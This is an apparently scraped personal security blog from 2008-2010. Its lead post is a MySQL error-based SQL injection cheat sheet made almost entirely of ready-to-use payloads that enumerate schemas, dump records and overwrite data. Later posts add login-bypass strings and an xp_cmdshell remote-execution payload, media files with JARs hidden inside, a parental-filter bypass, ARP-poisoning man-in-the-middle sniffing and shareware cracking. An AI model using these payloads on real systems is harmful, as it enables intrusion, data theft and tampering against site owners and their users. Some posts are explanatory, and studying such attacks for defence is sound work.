#>_HACK SAFE

Quick & Dirty MySQL (Error Based) SQLi CheatSheet

2010-10-19T13:20:00.009+05:30

So, you have a web application vulnerable to Blind SQL Injection (test the param with single quote ' ) and you need dirty & quick cheats to dig deeper.

Note:

The data is fetched using a Hex() and a type casting with the cast() to make the query reliable and avoid bad characters and format strings issue (for example 0x00 as the last byte of every data fetched.) These payloads heavily rely on the information_schema database. So if you don't get the desired result, it just means that the remote database server doesn't have it.

These payloads are only crafted for Error-based MySQL Injections using String type parameters. If you know what I'm talking about, go play!

No more crap, straight to the point.

1. To test blind injection

' and 'x'='x

2. To select the current database (Output will be in Hexadecimal, decode to ASCII

' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

3. To find the current user

1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

4. To find MySQL Version

1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

5. Find current database

1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

6. To find the system user

1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

7. To find the hostname

1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

8. To find the installation directory

1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

9. To find the DB User

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

10. To find the databases

Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response.

assume n = 0

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

...

11. To count the number of tables in the selected database

1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Note: Note this count as n, assume m = 0

Replace colored strings with appropriate value

12. To get the table names in the selected database

Note: m-n implies execute this query starting from m=0, m+1…n-1

Replace colored strings with appropriate value

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

13. To get number of columns in the selected table name

1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Note: Note this count as n, assume m = 0

Replace colored strings with appropriate value

14. To get column names of a selected table name

Note: m-n implies execute this query starting from m, m+1…n-1

Replace colored strings with appropriate value

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

15. To count the number of records in a selected column

Note: Remember this count as n

1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

16. To fetch records from a selected column

Note: m-n implies execute this query starting from m, m+1…n-1

Replace colored strings with appropriate value

1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

17. Update a record in the selected column

1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--

I will update the cheat sheets for other database servers too in separate posts. Keep watching. Till then take care and bye.

Why?Newton: My Engineering Story - 2009

2009-12-08T00:12:00.000+05:30

Why?Newton: My Engineering Story - 2009

Who kept the jars out? - Beyond GIFARs

2009-12-03T20:13:00.011+05:30

No, I’m not talking about the cookie jar. This time I’m serious and it’s getting hotter. You see photos, you read books, and you watch videos. But have you ever wondered that they all, too, watch you? They know what you do. And, often, they speak it back loud. No this not some sort of black-magic or some horror movie promo. This is real. If you haven’t faced it yet, you will!

Remember GIFAR? No? Never heard even? Well GIFAR, is a new attack vector for browser based exploits. It was discussed in BlackHat USA 2008. GIFAR = GIF + JAR. It is basically injection of a Java Executable Archives (.jar files) into innocent looking GIF images (.gif files). Upon injection the GIF image will still be a valid image file with all the new executable code functionalities in the background. This can be misused by malicious hackers to perform all sorts of background mischief while you are busy watching the image. They can:

Steal and Replay Cookies
Hijack Sessions
Impersonate Users
Takeover website accounts

But that’s not just. According to my personal research based on this attack vector, I have concluded that this attack has a more diversified impact. In short, I was successful in making PNGAR, PDFAR, FLVAR, MP4AR. If I’m not wrong, you have already figured out what I’m
talking of.

PNG + JAR = PNGAR
PDF + JAR = PDFAR
FLV + JAR = FLVAR
WMV + JAR = WMVAR
MP4 + JAR = MP4AR

Here is the Proof of Concept:
1. The original file, a decent video.

2. The malicious JAR file, I used the burp suite for demo.

3. The resulting MP4AR file.

Now for using in web, you can do something like this:

< APPLET *
CODE = " StartBurp.class " WIDTH = " 100% " HEIGHT="90" ARCHIVE = " hackme.mp4 " >
< / APPLET >

Can you imagine the consequences? If not, ask yourself, today how websites today host or allow to host, any or all of the above mentioned media i.e. GIF, PNG, PDF, FLV, WMV, MP4? Now if we talk about real life impact of this attack vector, I would like to point few sites which are known for hosting those files only.

GIF – all most all
PNG – -do-
PDF – scribd, google docs
FLV – youtube, gmail chat
MP4 – youtube

It doesn’t even end here. It’s not about the JAR files, only. ZIP and files based on the ZIP architecture can, too, be injected. Though injecting ZIP files may be not interesting to potential web hackers. It can prove to be a valuable tool for hackers who want to cover their tracks or traces i.e. post-exploitation evidence clearance.

Well fortunately, there is a workaround for this vulnerability. A simple way is to re-save the file in another or even the same format and it would render the file harmless while keeping the useful content intact. I have written (actually, half-done ;)) a Perl based tool that scans for malicious content in harmless files. I will post up the link as soon as I get time to complete it.

So next time you watch a photo, beware of its eye. :)

BSNL 3G (Micromax MMX 300G) in BackTrack 4 (Ubuntu 8.10)

2009-09-28T21:37:00.005+05:30

Hey folks,

I got my BSNL 3G data card yesterday. Its actually a Micromax MMX 300G (HSPA/HSDPA/UMTS/EDGE/GPRS) USB Modem. Its uses ZeroCD (TM) architecture i.e. it has no extra CD for drivers. When you plug in the modem for the first time, you'll see a CD-Drive in your My Computer. After you install the drivers, it won't be detected as a CD-Drive any more. And you can use the modem's dialer to connect to the internet. 7.2 Mbps in the car is the best part of it :-).
But the problem is when you plug it into your linux box. The product website says its compatible with Win2000/XP/VISTA/MAC only.

Being curious and annoyed, I decided to make it work in my BackTrack 4 Pre Release. And finally, i got it! :-D

Here's how:

1. Goto Konsole and write

$ modprobe usbserial vendor=0x1c9e product=0x9603

2. and in the same console type

$ dmesg

to see the name of the modem device in the /dev directory e.g. /dev/ttyUSB0, or /dev/ttyUSB1 or /dev/ttyUSB2. In my case it was ttyUSB2.

3. then you need to edit the wvdial.conf file in the /etc/wvdial.conf. Open the file with any editor, say Kwrite, delete all its contents and write the following in it:

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init4 = AT+CGDCONT=1,"IP","gprseast.cellone.in" <----------Replace your APN here Dial Command = ATDT
Carrier Check = no
Modem = /dev/ttyUSB2 <------- Replace your device name here Modem Type = USB Modem
Baud = 7200000
New PPPD = yes
Stupid Mode = 1
ISDN = 0
Username = 165 <---------- Replace your user name here
Password = 165 <----------Replace your password here
Phone = *99***#

now save and close the file.

4. And the end, open a new Konsole and write

$ wvdial

And now, you be able to connect to the internet. Don't close this window. Press Ctrl + C, to terminate the connection.

Windows Live! Family Safety - A mere farce!

2009-04-13T13:22:00.008+05:30

Well, Today I turned on my laptop in the morning with a cup of tea. I got a notification that my Windows 7 pc has a new update to install called Windows Live Essentials. Browsing through its contents, the only thing that prompted me to install the update was the Windows Live Family Safety. After an ~190 MB download and install, I rebooted my laptop, and noticed that Family Safety is an content filtering application for blocking pornographic, violence, drugs etc related content from the innocent family members. It is web based and you must have a Windows LiveID to use and administer it. Every time you login to your desktop, you find:

as you see in the above screenshot that Web Browsing was blocked until it has been authenticated by the administrator/parent. But kids now a days have become smart enough to get a workaround for this. And they will find it fun to bypass the Windows Live Family Safety as it is so easy to do.
Just follow the screenshots below and you are done!

The highlighted Windows Service is the engine for Windows Live Family Safety. So as a matter of fact, we should be able to bypass the filtration if we are able to Stop this service, provided it should not Restart itself. So lets see (fingers crossed ;))

OK, now that we have stopped the service, let us check if it really works, I don't think it would be so easy for us. Just to confirm,

He he he! It was really that easy. Well its a minor bug that can be fixed. But till its done, concerned parents please don't rely on Windows Live Family Safety!

For those who want to test this straight and fast, here is a proo-of-concept tool that I have personally coded. Download it here.
Good Bye! Take Care.

WarDriving with the Nokia N95

2009-02-23T12:55:00.008+05:30

I’ve been looking for a war driving application for my N95 ever since I got it. I mean hey, it has Wi-Fi support and a built-in GPS, so isn’t it the perfect portable war driving hardware? Luckily today I came across the application I’ve been looking for. It’s Barbelo v0.3.You can grab a copy of yours from here. And GPSd v0.2, an add-on tool if you want to use your phone's GPS capabilities with Barbelo.

Steps To War Drive with Nokia N95:

1. Now that you have GPSd and Barbelo installed, you have to run GPSd first. Select Menu -> Applications -> GPSd.

2 . You will be prompted to allow GPSd to use Positioning Data. Select Yes.

3 . Next you are prompted to allow GPSd to use the network and send or receive data. Also select Yes.

4. It may take awhile for GPSd to get a fix. Try going outside somewhere with a clear, unobstructed view of the sky. Once you have a GPS fix as indicated by numbers other than 0 showing up under Latitude and Longitude, press Hide to leave GPSd running in the background. This is important because if GPSd isn’t running, Barbelo won’t be able to log any location data.

5. Now run Barbelo by selecting Menu -> Applications -> Barbelo.

6. As you can see, Barbelo has already found a network. The row of X’s below the network name corresponds to the signal strength. That’s great but we want to make sure we log this information. By default Barbelo doesn’t log anything. You must specifically select Options -> Start Log.

7. In the main Barbelo screen, you can use the Left and Right toggles to move between Scan, Map, and Debug screens.

8. I’m hoping the Barbelo developer(s) might be intending to include a way to upload maps of your area in a future release as a map with nothing but a white background isn’t much of a map. At least it does show you where networks are in relation to each other and your current position.

If you go back to the Scan screen, you can scroll through the detected networks and press the Center toggle to see more information about that particular network

9. Also of interest, if you leave Barbelo running in the background and switch back to GPSd, you can see that GPSd has now detected the fact that Barbelo is running, as indicated by the 1 under Clients.

10. Next, I went for a short drive to gather some data. When you’re finished gathering data, stop Barbelo from logging by selecting Options -> Stop Log.

11. You can now stop Barbelo by selecting Options -> Exit.

12. Don’t forget to stop GPSd as well. Switch back to GPSd and close it using the Right Soft Key to exit.

13. Ok, now that we’ve gathered some data, let’s do something interesting with it. Barbelo stores its logs in your phones mass memory at E:\barbelo\logs

14. Transfer the logs to your computer via Bluetooth or USB data cable. Luckily Barbelo saves its logs in the same XML format as Kismet so we can, for example, convert this data into a format suitable for Google Earth. I found a handy perl script called kisgearth that does the job for us. If you don’t have access to a Linux box, don’t worry. perl is also available for Windows. Watch for my future tutorial about running perl on Windows. Converting the Barbelo log was as easy as running: ./kisgearth.pl -oN Barbelo-Oct-20-2008-1.kml -n1 — Barbelo-Oct-20-2008-1.xml kisgearth has a large number of options and filters. For a list, simply run kisgearth.pl without any parameters.

15. The output file from the above command is a Google Earth kml file. Open Google Earth and choose File -> Open, then browse to your recently converted kml file and open it. Here’s what it looked like for me:

16. Once you have your wardriving data saved in a standard format, the possibilities of what you can do with it are virtually endless. I’ve included a copy of my Barbelo Log file if you would like something to play with. If you discover something interesting, please let me know in the comments below.

Hacking Certificate Check in S60 3rd Edition Apps

2009-02-17T11:51:00.002+05:30

I got a brand new Nokia N95 Classic 2 days back. I read many articles about its features over blogs and auction sites and was amazed to know that my N95 has an in-build 3D Accelerometer (Motion Sensor) which make it feel like the iPhone. I digged into symbian forums to get some cools apps that exploit this feature. Fortunately i got many such apps along with their sexy promo videos. But the challenge was there in installing them. Every time I pushed any of the app I got a "Certificate Error" or "Untrusted Supplier" kinda error. I researched a lot about this issue which I later got to know is indeed a major issue as lots of How-Tos are there on it. But the one that really works and is the most easiest is what I'am going to discuss here.

If you have such an issue, I'm sure this post will be a great help to you. I have fully tested it on my Nokia N95. Ok, now business. To install the apps avoiding the error you need to sign the .SIS installation files with a valid certificate.

So, what you need:

- Certificate, .CER File: You need to get a .CER file (certificate file) which is unique for every IMEI. This is usually done by developers who wish to test their apps on the target platform before a public beta release. You can get the .CER file here. Submit your IMEI (Press *#06# from your phone keymat to get it) there and wait for 12 hours. After 12hrs visit the site again and re-submit your IMEI there. You will now get a button saying "Download" Then copy the .CER file to any directory in your phone (say, memory card). Yippie! we are half done.

- S603rd App Signer: You will require a tool to sign the .SIS apps that you wish to install with the .CER file you received in previous step. There are many available tools for this. But I recommend you to get this. Install this app to your phone. And open it up your Applications > S603rdSigner. Then goto Settings in the app's menu and put the path to the .CER file. Done!

Everything ready. Now you can transfer unsigned .SIS files to your phone and SIGN them with the tool you just installed. By default the app saves the newly signed .SISX file in the source directory. All you have to do is to launch the .SISX file to start the installation. You can do it by using a file system browser "Xplore by LCG".

But remember that the SIGNed files are valid for YOUR mobile only. You need to UNSIGN them first to share it with your peers and they have to re-SIGN them again using the same steps said.

Demistifying SQL Injection

2008-08-11T13:54:00.000+05:30

With improved performance of database servers most of the web applications use (RDBMS(Relational Database Management Systems). And the web applications allow its valid users to either store/edit/view the data stored in RDBMS through the interface coded by the application programmers. Traditionally programmers have been trained in terms of writing code to implement the intended functionality but they are not aware of the security aspects in many ways. Thus now we have insecure interface to the most valuable data stored in RDBMS because of the vulnerability in the web application called SQL Injection. Attackers use exposure due to SQL injection vulnerability to interact with RDBMS servers in SQL (Structured Query Language). In other words it means that attackers are able to send SQL statements to RDBMS, which it executes and returns the results back to the attacker. The risk of such attacks on commercial application increases if the web application is delivered along with the source code or if it is an open-source application. Since the attacker can find potential vulnerable statements before they launch the attack.

What is SQL injection?

Normally web applications provide interface to the user to input the information. These user inputs are further used for many purposes one of which is to query the databases. The user input as part of SQL statements gets executed on the RDBMS. SQL injection is trying to input such data through the web applications user interface that would give malicious user the sensitive information, edit/modify the protected data or crash the entire system etc. In the worst-case scenarios the malicious user is able to even penetrate further into the network by compromising the security of the database host machine.

Four main categories of SQL Injection attacks

1. SQL Manipulation: manipulation is process of modifying the SQL statements by using various operations such as UNION .Another way for implementing SQL Injection using SQL Manipulation method is by changing the where clause of the SQL statement to get different results.

2. Code Injection: Code injection is process of inserting new SQL statements or database commands into the vulnerable SQL statement. One of the code injection attacks is to append a SQL Server EXECUTE command to the vulnerable SQL statement. This type of attack is only possible when multiple SQL statements per database request are supported.

3. Function Call Injection: Function call injection is process of inserting various database function calls into a vulnerable SQL statement. These function calls could be making operating system calls or manipulate data in the database.

4. Buffer Overflows: Buffer overflow is caused by using function call injection. For most of the commercial and open source databases, patches are available. This type of attack is possible when the server is un-patched

How to find if the application is vulnerable or not?

As mentioned before web applications commonly use RDBMS to store the information. The information in RDBMS is stored/retrieved with the help of SQL statements. Common mistake made by developers is to use, user supplied information in the Where clause of the SQL statement while retrieving the information. Thus by modifying the Where clause by additional conditions to the Where clause; entire SQL statement can be modified. The successful attempt to achieve this can be verified by looking at the output generated by the DB server. Following Example of Where clause modification would explain this further.

If the URL of a web page is:

1. http://www.prey.com/sample.jsp?param1=9 The SQL statement the web application would use to retrieve the information from the database may look like this: SELECT column1, column2 FROM Table1 WHERE param1 = 9 After executing this query the database would return data in columns1 and column2 for the rows which satisfy the condition param1 = 9. This data is processed by the server side code like servlets etc and an HTML document is generated to display the information.

2. To test the vulnerability of the web application, the attacker may modify the Where clause by modifying the user inputs in the URL as follows. http://www.prey.com/sample.jsp?param1=9 AND 1=1 And if the database server executes the following query: SELECT coulmn1, column2 FROM Table1 WHERE param1 = 9 AND 1=1 . If this query also returns the same information as before, then the application is susceptible to SQL injection.

Suggested Attack Vectors:

Login Bypass:

' or x=x--
'' or x=x--
or x=x--
' or 'x'='x
'' or ''x''=''x
') or ('x'='x

Remote Execution:

Using the stored procedure master ..xp_cmdshell

'; exec master ..xp_cmdshell 'ping xxx.xxx.xx.xx'--

Your imagination is your limit for exploiting a SQL Injection.

Precautions to avoid SQL Injection Attacks:

Always filter various input meta-characters like ' " % \ ; | / () {} or extended characters like NULL.
For numeric values convert it into an integer before passing it into the SQL query.
Always delete stored procedures which are never useful anymore like master ..Xp_cmdshell, xp_startmail, xp_makewebtask and xp_sendmail.

An Introduction to ARP Poision Routing

2008-08-11T13:40:00.000+05:30

APR

APR (ARP[Address Resolution Protocol] Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name "ARP Poison Routing" derives from the two steps needed to perform such unusual network sniffing: an ARP Poison Attack and routing packets to the correct destination.

ARP Poison Attack

This kind of attack is based on the manipulation of host's ARP caches. On an Ethernet/IP network when two hosts want to communicate to each other they must know each others MAC addresses. The source host looks at its ARP table to see if there is a MAC address corresponding to the destination host IP address. If not, it broadcasts an ARP Request to the entire network asking the MAC of the destination host. Because this packet is sent in broadcast it will reach every host in a subnet however only the host with the IP address specified in the request will reply its MAC to the source host. On the contrary if the ARP-IP entry for the destination host is already present in the ARP cache of the source host, that entry will be used without generating ARP traffic.

Q: Now what happens if the source host has in its ARP cache an incorrect MAC address associated to the IP address of the destination host ?

A: Simple, it will start the communication with the destination host using the incorrect MAC address in Ethernet frames.

Q: And what happens if that incorrect MAC address corresponds to the MAC address of our network sniffer ?

A: The traffic will reach our sniffer even if every host is connected to a network switch forwarding frames on port basis.

Q: How can someone change the addresses contained in host's ARP caches ?

A: The Address Resolution Protocol (ARP) is a stateless protocol that does not require authentication so a simple ARP Reply packet sent to an host can force an update in its ARP cache.

Q: Can I use this kind of attack on the Internet ?

A: No. ARP protocol does not cross routers or VLANs so ARP Poison attacks are useless outside Level2 "Broadcast Domains".

Manipulating ARP caches of two hosts, it is possible to change the normal direction of traffic between them. This kind of traffic hijacking is the result of an ARP Poison attack and also a prerequisite to achieve a "Man-in-the-Middle" condition between victim hosts. The term Main-in-the-Middle refers to the fact that the traffic between hosts follows an obligated path through something before reaching the desired destination.

Re-Routing Packets

Now suppose that you successfully setup an ARP Poison attack between two hosts to intercept their network traffic. To do so you had specified the sniffer MAC address in ARP Poison packets and now you are forcing the two hosts to communicate through your computer.

In this situation the sniffer receives packets that are directed to its MAC address but not to its IP address so the protocol stack discards these packets causing a Denial of Service between the hosts. To avoid such problems the sniffer must be able to re-route poisoned packets to the correct destination. (You can't capture any password if hosts cannot communicate)

Prerequisites

In order to re-route poisoned packets to the correct destination, the program must know each IP-MAC association of victim hosts. This is why the user is asked to scan for MAC addresses first.

Understanding XOR Encryption

2008-08-11T13:22:00.000+05:30

INTRODUCTION:

Hi guys, me again. In this tutorial, I'll discuss one of the most common encryption - XOR. You won't require any particular tools for this stuff.

HERE IT IS:

XOR is the acronym for "eXclusive OR". It is a bitwise operator, i.e a operator which manipulates data at the bit level. You may be familiar with other bitwise operators like AND and OR. I'll revise the functioning of those for your reference.

AND:

It is a binary operator which evaluates to true only if both the operand bits are true. I can see you sweating. relax! All that crap means is

1 AND 1 = 1.

If one of the operand bit is false, i.e. zero, the result evaluates to false. Therefore,

1 AND 0 = 0

0 AND 1 = 0

Now, 54 AND 105 evaluates to 32 in a scientific calculator. How this happens is:

54 , written in binary is 00110110

105, written in binary is 01101001

AND operator is called for each and every corresponding bits. Thus the resultant is:

00100000 which corresponds to 32 in decimal. In C / C++ it is represented by '&'.

It is a binary operator which evaluates to false only if both the operands are false. it means

0 OR 0 = 0

Rest all possible combinations evaluates to true or 1. In C / C++ it is represented by '|'.

XOR

It is a binary operator which evaluates to true if both the operand bits are dissimilar. It evaluates to false if both the operand bits are similar. Hence,

1 XOR 1 = 0

0 XOR 0 = 0

1 XOR 0 = 1

0 XOR 1 = 1

Well, I know what you might be wondering... How can this be used in encryption??????? I'll show you how.

Take a scientific calculator in your hand. Alternatively, you may use the calculator which was provided to you by Bill Gates. Goto scientific mode in VIEW. Now find out what 15 XOR 20 is.

Yes you got it right. It's 27. No big deal. Wait... now find out what 20 XOR 27 is.

Yes you are again right. The correct answer is 15!!!!!!!! Hmmm... I can smell something fishy. Now can u guess what is 15 XOR 27. You guessed it correct. It's 20.

In general if 'a XOR b = c'

then, 'b XOR c = a' and 'a XOR c =b'

In encryption, we have to choose a number, say 12. We call this a key number. Now take the data you want to encrypt. Lets take fornix as an example. Now XOR each and every letter of the word fornix with 12 . The resulting pattern will be encrypted. E.g. the ASCII value of f is 66. when XOR ed with 12 it gives 78. In this way we'll get a sequence of encrypted data. To decrypt, we again XOR the encrypted data one by one with 12.

Another common use of XOR is to clear the registers. A number XORed with itself gives zero. Hence "XOR eax, eax " command clears the eax register. It has nothing to do with encryption

Introduction to Reverse Engineering

2008-07-10T13:33:00.000+05:30

Introduction:

When I started Reverse Engineering, I remember that I had a tough time learning it. I didn't know where to start from. I had decided that I'll write an essay on this topic. That's before your eyes right now. This essay is intended to be read only by a newbie. OK lets begin...

What is Reverse Engineering?

Reverse Engineering is an art of removing protections from programs. It can be making a CD game to run without a CD, making shareware programs to run well beyond their evaluation time, finding correct serial code for programs, etc...

Is Reverse Engineering legal?

Yes, Reverse Engineering is perfectly legal, but using Reverse Engineered programs is not. Usually Reverse Engineers aren't interested in using the Reverse Engineered programs. The feeling that they have Reverse Engineered, is sufficient.

Requirements for Reverse Engineering:

1: Brain (It's the most important thing!)

2: A good knowledge of Assembly Language (ASM - It's a lower level programming language). Relax, knowledge to read assembly language is sufficient. Programming in ASM is not essential. For learning ASM, I suggest that you go for the book "Art of Assembly Programming - Ranadll Hyde"

3: A decent computer. By this, I mean at least a 486 machine with at least 32 megs of RAM and about 100 Mb of free hard disk space. No links for this one ; - )

4: Reverse Engineering tools. More about them later. Go to links section of the site for the tools.

5: Knowledge of any higher level programming languages like C, C++, Pascal etc helps a lot though not compulsory.

Congratulations! You are set to be a Reverse Engineer:

I'll explain to you the procedure of making a program. First, the programmer writes the source code of the program in any text editor. Then, this source code is compiled by means of a compiler. Compiler understands the programming language (e.g.. C, C++). During compilation, the compiler (Mind you, compiler is not a person but another program ; - )) translates the easily readable text into assembly language instructions (The same ASM) and an object file is created. But hey, your Computer is really stupid. It does not even understand ASM language as we see it (eg. mov ax, bx). All it understands is 0 and 1 ( 0 for off and 1 for on. Actually it's not 0 for 'off', but a small voltage for 0 and a relatively high voltage for 1). Thus writing machine code (0's and 1's) is very tough for human beings. It would have been a lot more convenient if the commands had names instead of codes. That's where ASM comes in. ASM uses mnemonics (like CMP for compare) instead of codes. Actually ASM and machine code are almost the same. Back to object file... The object file is linked by a linker to form a executable (.exe) file. Now you may ask, "What's the difference between an object file and an executable file?" Both of them contain the same ASM code but an object file cannot be executed. The linker adds some headers and sections to the object file so that it can run in a secified operation system. So one can conclude that the object file of a program written in C is same whether it is compiled by a windows based compiler or a linux based compiler. The only difference is in the final output file i.e executable file. The steps, i.e. from source code to object file and from object file to executable file is not reversible. As we don't get source code of programs along with shareware versions of it, things are tougher for us : - ( But there is ASM to our rescue! We can certainly disassemble executable files into ASM instructions by means of a disassembler. Did I say disassembler? That's one of the Reverse Engineering tools that really has some use :-) There are many disassemblers available. I suggest using W32dasm (It's Windows 32 bit disassembler). Where will I find it? Don't be an idiot, go to links section of the site.

Procedure of simple Reverse Engineering:

1: Investigate the program to be Reverse Engineered completely. Note the occurrences of message boxes, text boxes, etc... depending upon the type of Reverse Engineer.

2: Disassemble the file in w32dasm and search the code for reaching the correct location. There are various methods of doing this. Note down the offset number (Just remember it as a number in memory corresponding to the particular instruction).

3: Open your file in Hex editor and go to the noted offset number and patch it (i.e. change the code).

Now what is an hex editor? It is a tool which helps us in changing the instructions, i.e. assembly codes. So, disassembler and hex editor goes hand in hand. There are many hex editors available. I would suggest using HEXWORKS 4.0 or hiew 6.7 (or higher versions). Hiew is better than HEXWORKS, but is a bit tough to use for beginners. You start with HEXWORKS, but upgrade to hiew soon. There is another mother of all Reverse Engineering tools called SoftIce, but you'll need to use it when you become comfortable with Reverse Engineering.

Outroduction:

I haven't explained the process of Reverse Engineering. Tutorials for the same are available freely on the net. I don't expect that you will directly go and Reverse Engineer a program after reading this essay. My aim was to show you the right direction. It's you who have to follow it. Have you got an idea about Reverse Engineering? That's enough for now. The rest depends upon your interest and dedication in this subject. That's the purpose of providing you with links. Don't take these links lightly. It's difficult to find writings of this hardly understood subject on the net.

My Brief

2008-07-08T19:59:00.000+05:30

Hello all! Welcome to my blog on security. I'm Nishant Das Patnaik. I'm a pre-final year Computer Science engineering student of Biju Patnaik University of Technology, Orissa. India . I'm the Exec. Director, Innovate7 Technologies. Its an India based company works in the Web 2.0, Enterprise Infrastructure Security Audit, End-to-End Security Products Development. Me also fortunate enough to be the President, National Ethical Hackers Association. This year I have been appointed as a Microsoft Student Partner. I will be posting interesting and practical guides to real-world security issues. Mostly my posts would be concentrating on Reverse Engineering, Web Application Security, Network Security & Applied Cryptography.